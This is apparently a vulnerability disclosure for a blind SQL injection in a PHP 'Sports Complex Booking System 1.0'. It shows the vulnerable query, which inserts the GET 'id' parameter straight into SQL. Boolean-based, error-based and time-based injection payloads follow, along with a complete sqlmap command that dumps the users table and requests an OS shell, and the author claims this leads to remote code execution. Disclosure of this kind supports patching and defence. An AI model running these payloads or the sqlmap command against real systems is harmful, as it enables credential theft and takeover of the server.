# Title: Sports Complex Booking System 1.0 Blind SQLi To Rce # Author: Hejap Zairy # Date: 24.07.2022 # Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache #vulnerability Code php ```php if(isset($_GET['id']) && $_GET['id'] > 0){ $qry = $conn->query("SELECT f.*, c.name as category from `facility_list` f inner join category_list c on f.category_id = c.id where f.id = '{$_GET['id']}' "); if($qry->num_rows > 0){ foreach($qry->fetch_assoc() as $k => $v){ $$k=stripslashes($v); } } }``` #Status: CRITICAL ``` Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=view_facility&id=4' AND 1013=1013-- aQIm Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: p=view_facility&id=4' OR (SELECT 7626 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7626=7626,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SkTl Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=view_facility&id=4' AND (SELECT 5013 FROM (SELECT(SLEEP(5)))lCeY)-- pdUo --- ``` #Blind SQLi Time to Rce #ُExploit sqlmap -u 'http://0day.gov/scbs/?p=view_facility&id=4' --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p id -D scbs -T users --dump --os-shell # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://i.imgur.com/nY9GR9F.png